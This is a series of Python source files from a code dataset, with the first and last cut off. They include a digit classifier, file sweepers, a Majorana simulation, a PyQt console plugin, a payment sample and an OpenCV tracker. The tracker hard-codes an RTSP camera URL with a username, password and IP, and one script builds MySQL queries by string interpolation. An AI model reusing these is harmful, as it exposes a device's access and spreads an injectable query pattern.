confusionMat(correct_Labels, Predicted_Labels ,excel_file_name):\n label = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'zero', 'one', 'two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ZeroTH', 'OneTH', 'TwoTH', 'ThreeTH', 'FourTH', 'FiveTH', 'SixTH', 'SevenTH', 'EightTH', 'NineTH']\n con_mat = confusion_matrix(correct_Labels, Predicted_Labels,labels=label)\n print(con_mat)\n print(con_mat.shape)\n siz = con_mat.shape\n size = siz[0]\n total_pres = 0\n for i in range(size):\n total_pres = 
total_pres + (con_mat[i, i])\n print('Class accuracy '+str(i)+': '+str(con_mat[i, i] / float(np.sum(con_mat[i, :]))))\n print('total_accuracy : ' + str(total_pres/float(np.sum(con_mat))))\n df = pd.DataFrame (con_mat)\n filepath = excel_file_name\n df.to_excel(filepath, index=False)\n#correct_lables = matrix of true class of the test data\n#Predicted_labels = matrix of the predicted class\n\ndef showPic(img):\n cv2.imshow(\"show\",img)\n cv2.waitKey(0)\n\ndef deskew(img):\n m = cv2.moments(img)\n if abs(m['mu02']) < 1e-2:\n # no deskewing needed.\n return img.copy()\n # Calculate skew based on central momemts.\n skew = m['mu11']/m['mu02']\n # Calculate affine transform to correct skewness.\n M = np.float32([[1, skew, -0.5**skew], [0, 1, 0]])\n # Apply affine transform\n img = cv2.warpAffine(img, M, (60, 30), flags=cv2.WARP_INVERSE_MAP | cv2.INTER_LINEAR)\n return img\n\n\ndef HOG_int() :\n winSize = (20,20)\n blockSize = (10,10)\n blockStride = (5,5)\n cellSize = (10,10)\n nbins = 9\n derivAperture = 1\n winSigma = -1.\n histogramNormType = 0\n L2HysThreshold = 0.2\n gammaCorrection = 1\n nlevels = 64\n signedGradient = True\n hog = cv2.HOGDescriptor(winSize,blockSize,blockStride,cellSize,nbins,derivAperture,winSigma,histogramNormType,L2HysThreshold,gammaCorrection,nlevels, signedGradient)\n return hog\n\n# HOG parameters\nwinSize = (20,20)\nblockSize = (10,10)\nblockStride = (5,5)\ncellSize = (10,10)\nnbins = 9\nderivAperture = 1\nwinSigma = -1.\nhistogramNormType = 0\nL2HysThreshold = 0.2\ngammaCorrection = 1\nnlevels = 64\nsignedGradients = True\n\nhog = HOG_int()\nhog_descriptors = []\nlables = []\ntest_hog_descriptors = []\ntest_lables = []\nval_hog_descriptors = []\nval_lables = []\npath = 'C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'\ndirs = os.listdir(path)\n\n#Import test and training data\nfor files in dirs:\n a = files.split('_')\n d = a[len(a)-1]\n if d == 'train.txt':\n lab = 
a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n lables.append(str(lab))\n print('appended train '+str(files))\n if d == 'test.txt':\n labs = a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n test_hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n test_lables.append(str(labs))\n print('appended test '+str(files))\n if d == 'validate.txt':\n labs = a[len(a)-2]\n director = open('C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Dataset\\\\Tew\\\\Augmented_dataset\\\\'+str(files),'r')\n data = director.read()\n director.close()\n data=data.split('\\n')\n data=data[:-1]\n num =0\n for x in data:\n lisss=x.split(',')\n img = np.array(list(lisss[:]))\n img = img.reshape(-1,(60))\n img = img.astype(np.uint8)*255\n num += 1\n img = deskew(img)\n val_hog_descriptors.append(hog.compute(img,winStride=(20,20)))\n val_lables.append(str(labs))\n print('appended test '+str(files))\nhog_descriptors = np.squeeze(hog_descriptors)\nlables = np.squeeze(lables)\ntest_hog_descriptors = np.squeeze(test_hog_descriptors)\ntest_lables = np.squeeze(test_lables)\nval_hog_descriptors = np.squeeze(val_hog_descriptors)\nval_lables = 
np.squeeze(val_lables)\n\nprint('Begining feature selection...')\n#feature selection\nforest = ExtraTreesClassifier()\nforest.fit(hog_descriptors, lables)\nmodeltree = SelectFromModel(forest,prefit=True)\nX_new = modeltree.transform(hog_descriptors)\ntest_new = modeltree.transform(test_hog_descriptors)\nprint('Begining Knn fitting...')\nneigh = KNeighborsClassifier(n_neighbors=10)\nneigh.fit(X_new, lables)\njoblib.dump(neigh, 'C:\\\\Users\\\\MSI-GE72MVR-7RG\\\\PycharmProjects\\\\FIBO_project_Module8-9\\\\Don\\'t mess with me\\\\knn_model_gen.pkl')\nprint('Model saved!')\npred = neigh.predict(test_new)\nprint('predicted....')\nprint(pred.shape)\nprint('Generate confusion matrix...')\nconfusionMat(test_lables, pred , 'Gen_log.xlsx')\n","sub_path":"Don't mess with me/Hog example gen.py","file_name":"Hog example gen.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"521736287","text":"\n\"\"\"\nThis module contains the definitions of Sagittariidae's sweeper processes.\nThese are asynchronous processes that designed to drive the current state of\nthe world to a desired final state.\n\nThe sweepers are run as processes separate from the webservice. They may be\ninvoked by name by executing this module, typically from a scheduler such as\n`cron`.\n\"\"\"\n\nimport os\nimport shutil\nimport sys\n\nfrom . import app as sagittariidae\nfrom . 
import models\n\n\nlogger = sagittariidae.app.logger\n\nclass Sweeper(object):\n\n def run(self):\n raise NotImplementedError()\n\n def sweep(self):\n try:\n self.run()\n except Exception as e:\n logger.error('Unhandled exception in sweeper %s', self, exc_info=e)\n\n\nclass ArchivedFileDirSweeper(Sweeper):\n\n def _clean_(self, ssf, logger):\n config = sagittariidae.app.config\n src_path = os.path.join(config['UPLOAD_PATH'], ssf.relative_source_path)\n src_dir = os.path.dirname(src_path)\n if os.path.exists(src_dir):\n logger.info('Removing upload directory: %s' % src_dir)\n shutil.rmtree(src_dir)\n else:\n logger.warning('Upload directory doesn\\'t exist: %s' % src_dir)\n # FIXIT: Handle the OperationalError that may result if the database is\n # locked. It's not a critical failure, but spurious ERROR messages in\n # the log is never nice.\n ssf.mark_cleaned()\n\n def run(self):\n logger = sagittariidae.app.logger\n\n files = models.get_files(\n sample_stage_id=None,\n status=models.FileStatus.archived)\n logger.info('Found upload director{y,ies} for %d files(s) that are ready to be cleaned: %s', len(files), files)\n for f in files:\n try:\n self._clean_(f, logger)\n except Exception as e:\n logger.error('Error cleaning upload directory for file %s', f, exc_info=e)\n\n\nclass StagedFileSweeper(Sweeper):\n\n def _complete_(self, ssf):\n config = sagittariidae.app.config\n src_path = os.path.join(config['UPLOAD_PATH'], ssf.relative_source_path)\n tgt_path = os.path.join(config['STORE_PATH'], ssf.relative_target_path)\n tgt_dir = os.path.dirname(tgt_path)\n if not os.path.isdir(tgt_dir):\n os.makedirs(tgt_dir)\n shutil.copy(src_path, tgt_path)\n logger.info('Copied file: %s -> %s', src_path, tgt_path)\n ssf.mark_archived()\n\n def run(self):\n logger = sagittariidae.app.logger\n\n files = models.get_files(\n sample_stage_id=None,\n status=models.FileStatus.staged)\n logger.info('Found %d file(s) that are ready to be moved into place: %s', len(files), files)\n for f 
in files:\n try:\n self._complete_(f)\n except Exception as e:\n logger.error('Error moving file %s', f, exc_info=e)\n\n\ndef make_sweeper(c):\n try:\n if c == Sweeper:\n raise Exception('Not a sweeper impl %s' % c)\n i = c()\n if not isinstance(i, Sweeper):\n raise Exception('%s is not an implementation of %s' % (c, Sweeper))\n else:\n return i\n except Exception as e:\n logger.error('Invalid sweeper class %s', sys.argv[1], exc_info=e)\n raise e\n\n\nif __name__ == '__main__':\n make_sweeper(globals().get(sys.argv[1])).sweep()\n","sub_path":"app/sweepers.py","file_name":"sweepers.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"612387101","text":"#!/usr/bin/python\nimport sys\nimport MySQLdb\nfrom config import sqlhost,sqluser,sqlpasswd,sqldb\nfrom gene2paths import gene2paths\n\ndef table2dict(lines):\n colnames = lines[0].strip(\"\\n\").split('\\t')\n colnums = len(colnames)\n dict_out = {}\n for item in colnames:\n dict_out[item] =[]\n for line in lines[1:]:\n i = 0\n items = line.strip('\\n').split('\\t')\n for item in items:\n dict_out[colnames[i]].append(item)\n i = i + 1\n return dict_out\n\ndef ToAllnum(vs):\n num = len(vs) - 1\n return num\n\ndef ToExonum(vs):\n head = vs[0]\n bosy = vs[1:]\n region_idx = head.index(\"Region\")\n exonum = 0\n for v in bosy:\n if v[region_idx] == \"exonic\": \n exonum = exonum + 1\n return exonum\n\ndef ToGenenum(vs):\n head = vs[0]\n bosy = vs[1:]\n gene_idx = head.index(\"Gene\")\n genes = set()\n for v in bosy:\n if v[gene_idx] != \"\":\n genes.add(v[gene_idx])\n genenum = len(genes)\n return genenum\n\ndef ToPathnum(vs):\n head = vs[0]\n bosy = vs[1:]\n gene_idx = head.index(\"Gene\")\n genes = set()\n paths = []\n for v in bosy:\n if v[gene_idx] != \"\":\n genes.add(v[gene_idx])\n for gene in genes:\n try:\n pathways = gene2paths[gene]\n paths.extend(pathways)\n except:\n pass\n paths = set(paths)\n pathnum = 
len(paths)\n return pathnum\n\ndef anno2sqlnums(anno,sample_no):\n vs = []\n fp = open(anno)\n for v in fp:\n items = v.strip(\"\\n\").split(\"\\t\")\n vs.append(items)\n \n genome_variant_num = ToAllnum(vs)\n exo_variant_num = ToExonum(vs)\n genes_num = ToGenenum(vs)\n paths_num = ToPathnum(vs)\n#############get from mysql###################\n conn = MySQLdb.connect(host=sqlhost,user=sqluser,passwd=sqlpasswd,db=sqldb)\n cursor = conn.cursor()\n update_stage = \"update sample_info set stage = 3 where sample_no = %s \" % sample_no\n sql3_insert = \"insert into variant_data_nums (sample_no,genome_variant,exonic_variant,genes,pathways) values (%s,%s,%s,%s,%s)\" % (sample_no,genome_variant_num,exo_variant_num,genes_num,paths_num)\n sql3_update = \"update variant_data_nums set genome_variant=%s,exonic_variant=%s,genes=%s,pathways=%s where sample_no = %s\" % (genome_variant_num,exo_variant_num,genes_num,paths_num,sample_no)\n try:\n\t cursor.execute(sql3_insert)\n except:\n\t cursor.execute(sql3_update)\n cursor.execute(update_stage)\n cursor.close()\n conn.commit()\n conn.close()\n\n\n","sub_path":"seq-service/anno2arrange/anno2sqlnums/anno2sqlnums.py","file_name":"anno2sqlnums.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40142203","text":"\nfrom matplotlib import pyplot\nfrom numpy import linalg as la\nimport kwant\nimport numpy as np\nimport scipy.sparse.linalg as sla\nimport matplotlib.pyplot as plt\n\nf_nm2au = 18.89726133921252\nf_eV2au = 0.03674932587122423\nf_B2au=4.254382E-6\n\ndef onsite_e(sitei, dx, t, mu, delta):\n return -mu\ndef onsite_h(sitei, dx, t, mu, delta):\n return mu\n\ndef hopping_electron(sitei, sitej, dx, t, mu, delta):\n return -t\n\ndef hopping_hole(sitei, sitej, dx, t, mu, delta):\n return t\n\ndef hopping_electron_hole_minus(sitei, sitej, dx, t, mu, delta):\n return -delta\n\ndef hopping_electron_hole_plus(sitei, sitej, dx, t, mu, 
delta):\n return delta\n\n# def hopping_hole_electron_minus(sitei, sitej, dx, t, mu, delta):\n# return delta\n#\n# def hopping_electron_hole_minus(sitei, sitej, dx, t, mu, delta):\n# return -delta\n\ndef make_system(L, dx, t, mu, delta):\n sys = kwant.Builder()\n lat_e = kwant.lattice.chain(dx, name=\"e\")\n lat_h = kwant.lattice.chain(dx, name=\"h\")\n\n sys[(lat_e(i) for i in range(L))] = onsite_e\n sys[(lat_h(i) for i in range(L))] = onsite_h\n # sys[lat_e.neighbors()] = hopping\n # sys[lat_h.neighbors()] = hopping\n sys[kwant.builder.HoppingKind((1,), lat_e, lat_h)] = hopping_electron_hole_plus\n # sys[kwant.builder.HoppingKind((1,), lat_h, lat_e)] = hopping_hole_electron\n sys[kwant.builder.HoppingKind((1,), lat_e, lat_e)] = hopping_electron\n sys[kwant.builder.HoppingKind((1,), lat_h, lat_h)] = hopping_hole\n # sys[kwant.builder.HoppingKind((-1,), lat_e, lat_h)] = hopping_electron_hole\n sys[kwant.builder.HoppingKind((-1,), lat_e, lat_h)] = hopping_electron_hole_minus\n sys[kwant.builder.HoppingKind((-1,), lat_e, lat_e)] = hopping_electron\n sys[kwant.builder.HoppingKind((-1,), lat_h, lat_h)] = hopping_hole\n\n sys = sys.finalized()\n return sys\n\n\n###### CALCULATE AND PLOT ENERGY SPECTRUM\nf = open('data.dat', 'w')\nt = 1\nL = 25\ndx = 0.1*f_nm2au\ndelta = t\nsteps = 200\nmu = 1\nsys = make_system(L, dx, t, mu, delta)\n\ndata_files = []\ndata_files_v = []\nfor i in range(2*L):\n data_files.append(open(\"dane/data%d.dat\" % (i), 'w'))\n\n\nfor i in range(steps):\n data_files_v.append(open(\"dane/v/data%d.dat\" % (i), 'w'))\n mu = t*4.0*i/steps # mu/t : [0; 3]\n\n print(\"delta = %e\\n mu = %e\\n mu/t = %e\" % (delta, mu, mu/t))\n\n ham_mat = sys.hamiltonian_submatrix(args=[dx,t, mu, delta], sparse=False)\n e, v = la.eigh(ham_mat)\n sites= sys.sites # funckaj ktora zwraca poszczegolne wezly\n psi= dict(zip(sites, v[:,49])) #gny chcemy stan zero\n print(len(v))\n psi_m = dict(zip(sites, v[:,L]))\n lat_e = kwant.lattice.chain(dx, name=\"e\")\n lat_h = 
kwant.lattice.chain(dx, name=\"h\")\n x_s = []\n ground = []\n majorana = []\n for w in range(L):\n # data_files_v[i].write(\"%e\")\n x_s.append(w)\n ground.append(np.abs(psi[lat_e(w)].real + psi[lat_e(w)].imag)**2 + np.abs(psi[lat_h(w)].real + psi[lat_h(w)].imag)**2)\n majorana.append(np.abs(psi_m[lat_e(w)].real)**2 + np.abs(psi_m[lat_h(w)].real)**2)\n data_files[w].write(\"%e %e\\n\" % (mu/t, e[w]/t))\n # f.write(\"%e %e\\n\" % (i*dx, np.abs(psi[lat(i)] )))\n # plt.plot(np.abs(psi[lat(i)]))\n # plt.show()\n for l in range(L):\n data_files[L+l].write(\"%e %e\\n\" % (mu/t, -e[l]/t))\n for j in range(L):\n data_files_v[i].write(\"%e %e\\n\" % (x_s[j], majorana[j]))\n\n\n# mu = 2.5\n# ham_mat = sys.hamiltonian_submatrix(args=[dx,t, mu, delta], sparse=False)\n# e, v = la.eigh(ham_mat)\n# sites= sys.sites\n# lat_e = kwant.lattice.chain(dx, name=\"e\")\n# lat_h = kwant.lattice.chain(dx, name=\"h\")\n# lat = lat_e\n# # knocks = []\n# # for i in range(L):\n# # knocks.append(lat_e(i))\n# # for i in range(L):\n# # knocks.append(lat_h(i))\n#\n# ##### SAVE wave function of the state corresponding to the pair of Majorana modes\n# majorana_data = open('majorana_data.dat', 'w')\n# psi= dict(zip(sites, v[:,L]))\n# for i in range(L):\n# majorana_data.write(\"%e %e\\n\" % (i,np.abs(psi[lat_e(i)].real)**2 + np.abs(psi[lat_h(i)].real)**2))\n#\n# ##### SAVE wave function of the first excited state\n# majorana_data = open('first_state.dat', 'w')\n# psi= dict(zip(sites, v[:,1]))\n# for i in range(L):\n# majorana_data.write(\"%e %e\\n\" % (i,np.abs(psi[lat(i)].real)))\n","sub_path":"playground/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252982406","text":"from core.plugin import Plugin\nfrom ..window.main import MainWindowPlugin\nfrom .interactive_console import InteractiveConsole\nfrom .interactive_console_widget import InteractiveConsoleWidget\n\nfrom 
PyQt5.Qt import Qt\nfrom PyQt5.QtWidgets import QDockWidget, QShortcut\n\nimport io\nfrom contextlib import redirect_stdout\n\n\nclass InteractiveConsolePlugin(Plugin):\n locals = None\n\n def __init__(self, main_window_plugin: MainWindowPlugin):\n super().__init__()\n\n self.main_window = main_window_plugin.main_window\n\n self.console_widget = InteractiveConsoleWidget()\n self.console_widget.command_entered.connect(self.on_command_entered)\n self.interactive_console = self.create_console()\n\n self.dock_widget = QDockWidget('Interactive Console')\n self.dock_widget.setWidget(self.console_widget)\n self.dock_widget.hide()\n\n self.shortcut = QShortcut(Qt.CTRL + Qt.Key_Greater, self.main_window)\n\n def _install(self):\n self.main_window.addDockWidget(Qt.BottomDockWidgetArea, self.dock_widget)\n self.shortcut.activated.connect(self.on_shortcut_activated)\n\n def _remove(self):\n self.shortcut.activated.disconnect(self.on_shortcut_activated)\n self.main_window.removeDockWidget(self.dock_widget)\n\n # Remove all created references (otherwise some plugins may not be deleted)\n self.interactive_console.reset_locals()\n\n def create_console(self):\n return InteractiveConsole(self.locals.copy(), self.console_widget.append_output)\n\n def reset_console(self):\n self.interactive_console = self.create_console()\n\n def on_command_entered(self, command_text):\n stdout = io.StringIO()\n with redirect_stdout(stdout):\n more_input_required = self.interactive_console.push(command_text)\n\n output_text = stdout.getvalue()\n if output_text.endswith('\\n'): # enter was redirected to stdout too, so we need to remove it\n output_text = output_text[:-1]\n if output_text:\n self.console_widget.append_output(output_text)\n print('InteractiveConsole >', output_text)\n\n self.console_widget.set_continue_input_prompt(more_input_required)\n\n def on_shortcut_activated(self):\n self.dock_widget.show()\n 
self.console_widget.focus_command_line()\n","sub_path":"image_vision/plugins/interactive_console/interactive_console_plugin.py","file_name":"interactive_console_plugin.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"68793622","text":"import os, sys\nimport imp\n\nfrom authorizenet import apicontractsv1\nfrom authorizenet.apicontrollers import *\nconstants = imp.load_source('modulename', 'constants.py')\nfrom decimal import *\nfrom authorizenet.apicontractsv1 import bankAccountType, accountTypeEnum\n\ndef credit_bank_account():\n\tmerchantAuth = apicontractsv1.merchantAuthenticationType()\n\tmerchantAuth.name = constants.apiLoginId\n\tmerchantAuth.transactionKey = constants.transactionKey\n\n\n\tpayment = apicontractsv1.paymentType()\n\n\tbankAccountType = apicontractsv1.bankAccountType()\n\taccountType = apicontractsv1.bankAccountTypeEnum\n\tbankAccountType.accountType = accountType.checking\n\tbankAccountType.routingNumber = \"125000024\"\n\tbankAccountType.accountNumber = \"12345678\"\n\tbankAccountType.nameOnAccount = \"John Doe\"\n\n\ttransactionrequest = apicontractsv1.transactionRequestType()\n\ttransactionrequest.transactionType = \"refundTransaction\"\n\ttransactionrequest.amount = Decimal ('2.55')\n\ttransactionrequest.payment = payment\n\ttransactionrequest.payment.bankAccount = bankAccountType\n\n\n\tcreatetransactionrequest = apicontractsv1.createTransactionRequest()\n\tcreatetransactionrequest.merchantAuthentication = merchantAuth\n\tcreatetransactionrequest.refId = \"MerchantID-0001\"\n\n\tcreatetransactionrequest.transactionRequest = transactionrequest\n\tcreatetransactioncontroller = createTransactionController(createtransactionrequest)\n\tcreatetransactioncontroller.execute()\n\n\tresponse = createtransactioncontroller.getresponse()\n\n\tif (response.messages.resultCode==\"Ok\"):\n\t print (\"Transaction ID : %s\" % 
response.transactionResponse.transId)\n\t print (response.transactionResponse.messages.message[0].description)\n\telse:\n\t print (\"response code: %s\" % response.messages.resultCode)\n\t print (response.messages.message[0]['text'].text)\n\n\treturn response\n\nif(os.path.basename(__file__) == os.path.basename(sys.argv[0])):\n\tcredit_bank_account()\n","sub_path":"PaymentTransactions/credit-bank-account.py","file_name":"credit-bank-account.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"52755319","text":"from django.shortcuts import render_to_response, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django import forms\nfrom ajax_select.fields import AutoCompleteField\n\nfrom . forms import GroupForm, PersonForm\n\n\nclass SearchForm(forms.Form):\n q = AutoCompleteField(\n 'member',\n required=True,\n help_text=\"autocomplete\",\n label=\"member\",\n attrs={'size': 100}\n )\n\n\ndef create_group(request):\n dd = {}\n if 'q' in request.GET:\n dd['entered'] = request.GET.get('q')\n initial = {'q': \"enter your new member\"}\n form = SearchForm(initial=initial)\n dd['form'] = form\n\n if request.method == 'POST':\n form = GroupForm(request.POST)\n if form.is_valid():\n group = form.save()\n group.save()\n return HttpResponseRedirect('.')\n else:\n form = GroupForm()\n return render_to_response('example/create_group.html', {'form': form, 'dd': dd}, context_instance=RequestContext(request))\n\n\ndef create_person(request):\n if request.method == 'POST':\n form = PersonForm(request.POST)\n if form.is_valid():\n person = form.save()\n person.save()\n return HttpResponseRedirect('.')\n else:\n form = PersonForm()\n return render_to_response('example/create_person.html', {'form': form}, 
context_instance=RequestContext(request))\n","sub_path":"example/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217258622","text":"#!/usr/bin/env python3\n\n# Created by: Manuel Garcia Yuste\n# Created on : December 2019\n# This program finds the average of all elements in a 2d list\n\n\nimport random\n\n\ndef calculator(dimensional_list, rows, columns):\n # this finds the average of all elements in a 2d list\n\n total = 0\n for row_value in dimensional_list:\n for single_value in row_value:\n total += single_value\n total = total/(rows*columns)\n\n return total\n\n\ndef main():\n # this function places random integers into a 2D list\n dimensional_list = []\n\n # Input\n rows = (input(\"How many rows would you like: \"))\n columns = (input(\"How many columns would you like: \"))\n try:\n # Process\n rows = int(rows)\n columns = int(columns)\n for rows_loop in range(0, rows):\n temp_column = []\n for column_loop in range(0, columns):\n random_int = random.randint(1, 50)\n temp_column.append(random_int)\n\n # Output 1\n print(\"Random Number \" + str(rows_loop + 1) + \", \"\n + str(column_loop + 1) + \" is \" + str(random_int))\n dimensional_list.append(temp_column)\n print(\"\")\n\n # Output 2\n averaged = calculator(dimensional_list, rows, columns)\n print(\"The average of the random numbers is: {0} \".format(averaged))\n\n except Exception:\n print(\"Invalid input\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2d_list.py","file_name":"2d_list.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"566466169","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom .task_factory_base import TaskFactoryBase\n\n\nclass FileCollectionTaskFactory(TaskFactoryBase):\n \"\"\"A Task Factory for generating a set of tasks based on the contents\n of an Azure Storage container or auto-storage file group. One task\n will be generated per input file, and automatically added to the job.\n\n :param source: The input file source from which the tasks will be generated.\n :type source: :class:`FileSource `\n :param repeat_task: The task template the will be used to generate each task.\n :type repeat_task: :class:`RepeatTask `\n :param merge_task: An optional additional task to be run after all the other\n generated tasks have completed successfully.\n :type merge_task: :class:`MergeTask `\n \"\"\"\n\n _validation = {\n 'type': {'required': True},\n 'source': {'required': True},\n 'repeat_task': {'required': True}\n }\n\n _attribute_map = {\n 'type': {'key': 'type', 'type': 'str'},\n 'source': {'key': 'source', 'type': 'FileSource'},\n 'repeat_task': {'key': 'repeatTask', 'type': 'RepeatTask'},\n 'merge_task': {'key': 'mergeTask', 'type': 'MergeTask'}\n }\n\n def __init__(self, *, source: str, repeat_task, merge_task=None, **kwargs) -> None:\n super(FileCollectionTaskFactory, self).__init__(\n merge_task=merge_task, **kwargs)\n self.source = source\n self.repeat_task = repeat_task\n self.type = 'taskPerFile'\n","sub_path":"azext/batch/models/file_collection_task_factory_py3.py","file_name":"file_collection_task_factory_py3.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402581429","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport sys\nfrom scipy.misc import imread\nfrom scipy.linalg import norm\nfrom scipy import sum, average\nfrom PIL import Image\nimport 
PIL\n\ndef cmp_main():\n file1='/home/ganesh/Desktop/imgcrp.jpg'\n file2 =\"/home/ganesh/Desktop/UntitledFolder3/temp.jpg\"\n # read images as 2D arrays (convert to grayscale for simplicity)\n img1 = to_grayscale(imread(file1).astype(float))\n img2 = to_grayscale(imread(file2).astype(float))\n # compare\n n_m, n_0 = compare_images(img1, img2)\n #print(\"Manhattan norm:\", n_m, \"/ per pixel:\", n_m/img1.size)\n #print(\"Zero norm:\", n_0, \"/ per pixel:\", n_0*1.0/img1.size)\n return n_m\n\ndef compare_images(img1, img2):\n # normalize to compensate for exposure difference\n img1 = normalize(img1)\n img2 = normalize(img2)\n # calculate the difference and its norms\n diff = img1 - img2 # elementwise for scipy arrays\n m_norm = sum(abs(diff)) # Manhattan norm\n z_norm = norm(diff.ravel(), 0) # Zero norm\n return (m_norm, z_norm)\n\ndef to_grayscale(arr):\n \"If arr is a color image (3D array), convert it to grayscale (2D array).\"\n if len(arr.shape) == 3:\n return average(arr, -1) # average over the last axis (color channels)\n else:\n return arr\n\ndef normalize(arr):\n rng = arr.max()-arr.min()\n amin = arr.min()\n return (arr-amin)*255/rng\n\n\np1=[67,43,160]\np2=[119,255,255]\ncap=cv2.VideoCapture(\"rtsp://admin:admin0864@121.6.207.205:8081/cam/realmonitor?channel=1&subtype=1\")\n\nwhile(cap.isOpened()):\n ret,frame=cap.read()\n if ret==True:\n cv2.namedWindow('VIDEO',cv2.WINDOW_NORMAL)\n cv2.imshow('VIDEO', frame)\n cv2.resizeWindow('VIDEO', 600,600)\n cv2.imwrite('v_image.jpg',frame)\n img=cv2.imread('v_image.jpg')\n hsv=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n\n lower=np.array(p1,dtype=np.uint8)\n upper=np.array(p2,dtype=np.uint8)\n mask=cv2.inRange(hsv,lower,upper)\n mask=cv2.GaussianBlur(mask,(3,3),0)\n res=cv2.bitwise_and(img,img,mask=mask)\n (__,cnts,__)=cv2.findContours(mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\n if len(cnts)>0:\n cnt=sorted(cnts,key=cv2.contourArea,reverse=True)[0]\n rect=cv2.minAreaRect(cnt)\n box=cv2.boxPoints(rect)\n 
box=np.int0(box)\n cv2.drawContours(img,[box],-1,(0,255,0),2)\n cv2.namedWindow('Tracking',cv2.WINDOW_NORMAL)\n cv2.imshow('Tracking', img)\n cv2.resizeWindow('Tracking', 600,600)\n W=rect[1][0]\n H=rect[1][1]\n xs=[i[0] for i in box]\n ys=[i[1] for i in box]\n x1=min(xs)\n x2=max(xs)\n y1=min(ys)\n y2=max(ys)\n rotated=False\n angle=rect[2]\n if(angle<-45):\n angle=angle+90\n rotated=True\n center = (int((x1+x2)/2),int((y1+y2)/2))\n size=(int(x2-x1),int(y2-y1))\n #cv2.circle(img,center,10,(0,255,0),-1)\n M=cv2.getRotationMatrix2D((size[0]/2,size[1]/2),angle,1.0)\n cropped=cv2.getRectSubPix(img,size,center)\n cropped=cv2.warpAffine(cropped,M,size)\n croppedW=W if not rotated else H\n croppedH=H if not rotated else W\n croppedRotated=cv2.getRectSubPix(cropped,(int(croppedW),int(croppedH)),(size[0]/2,size[1]/2))\n '''\n cv2.imwrite('/home/ganesh/Desktop/crprot1.jpg',croppedRotated)\n img = Image.open('/home/ganesh/Desktop/crprot1.jpg')\n img = img.resize((560, 234), PIL.Image.ANTIALIAS)\n img.save('/home/ganesh/Desktop/imgcrp.jpg')\n ck=cmp_main()\n if ck<7400000:\n '''\n cv2.imshow('cropped',croppedRotated)\n if cv2.waitKey(1)&0xFF ==ord('q'):\n break\n \ncv2.destroyAllWindows()\n\n\n\n\n","sub_path":"un_main_ck.py","file_name":"un_main_ck.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"384837787","text":"from django import forms\nfrom .models import Category, Sub_Category, Product, Brand\nfrom django.core.exceptions import ValidationError\n\nclass AddCat(forms.ModelForm):\n class Meta:\n model = Category\n fields = ('name', 'image')\n labels = {\n 'name' : 'Category Name',\n 'image': 'Choose a custom image',\n }\n widgets = {\n 'name': forms.TextInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n 'image': forms.FileInput(attrs={'class':'form-control', 'placeholder':'Category Name'}),\n }\n def clean_name(self):\n data = 
